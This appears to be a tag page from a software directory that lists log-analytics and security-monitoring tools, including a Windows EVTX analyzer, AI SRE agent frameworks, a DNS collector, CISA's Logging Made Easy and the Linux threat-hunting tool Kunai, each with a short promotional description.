log-analytics
Windows EVTX log analysis for DFIR — fast parsing, ATT&CK mapping, IOC extraction, and Sentinel anomaly detection. Normal + Juggernaut Mode (Arrow/DuckDB) for 10M+ events.
Agentic Alert Investigation for Production Pipelines.
Automated root cause analysis before your team gets paged. Build your own AI SRE agents. The open source toolkit for the AI era ✨
The open-source framework for AI SRE agents, and the training and evaluation environment they need to improve. Connect the 60+ tools you already run, define your own workflows, and investigate incidents on your own infrastructure.
Turn SOC Noise into Real Signals. Autonomous SOC Platform.
Qevlar AI investigates every alert like your top analyst would. So your SOC focuses on real threats, not alert firefighting.
Related contents:
Grab your DNS logs, detect anomalies, and finally understand what's happening on your network. The missing piece between DNS servers and your data stack.
DNS-collector is a lightweight tool that captures DNS queries and responses from your DNS servers, processes them intelligently, and sends clean data to your monitoring or analytics systems.
Related contents:
Analyze huge log files (10GB+) instantly in your browser. Zero upload, 100% local processing. Features JSON prettifier, regex filtering, and bookmarks.
The missing tool for DevOps and Backend Developers. Analyze gigabyte-sized log files instantly in your browser without crashing your device.
Related contents:
Reduce logs to their semantic anomalies.
Cordon uses transformer embeddings and density scoring to identify semantically unusual patterns in large log files, reducing massive logs to the most anomalous sections for analysis. Repetitive patterns (even errors) are considered "normal background." Cordon surfaces unusual, rare, or clustered events that stand out semantically from the bulk of the logs.
Related contents:
CISA’s LME provides a free, easy-to-deploy log management solution. It includes real-time threat alerts, customizable dashboards, and community collaboration on GitHub, helping small to medium-sized organizations improve their cybersecurity.
CISA's Logging Made Easy (LME) is a no cost, open source platform that centralizes log collection, enhances threat detection, and enables real-time alerting, helping small to medium-sized organizations secure their infrastructure. Whether you're upgrading from a previous version or deploying for the first time, LME offers a scalable, efficient solution for logging and endpoint security.
Related contents:
A real-time dashboard for analyzing Traefik logs with IP geolocation, status code analysis, and service metrics. Built with React (Shadcn UI) and Node.js.
Purpose-built log analytics UI for ClickHouse.
A modern, single binary, high-performance log analytics platform.
Logchef is a dedicated log query and visualization interface built specifically for ClickHouse. It fills a critical gap in the ClickHouse ecosystem, providing a powerful log explorer without reinventing log collection or storage.
Threat-hunting tool for Linux . Bring your Linux Threat-Hunting capabilities to the next level.
Kunai is a powerful tool designed to bring actionable insights for tasks such as security monitoring and threat hunting on Linux systems. Think of it as the Linux counterpart to Sysmon on Windows, tailored for comprehensive and precise event monitoring.
Related contents: